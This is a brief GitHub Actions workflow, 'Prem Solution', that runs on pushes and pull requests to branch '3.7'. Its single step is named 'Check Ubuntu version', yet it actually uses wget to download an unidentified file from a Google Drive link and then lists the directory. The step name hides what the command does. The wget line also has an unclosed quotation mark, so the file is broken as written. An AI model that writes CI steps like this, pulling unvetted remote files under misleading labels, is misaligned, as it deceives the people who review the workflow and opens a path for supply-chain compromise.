name: Prem Solution

on:
  push:
    branches: [ "3.7" ]
  pull_request:
    branches: [ "3.7" ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - name: Check Ubuntu version
      run: |
        wget "drive.google.com/u/3/uc?id=1OdBA9MTCYPwJGwvMt3f2qiDmz9oxoqi4&export=download&confirm=yes
        ls

# t
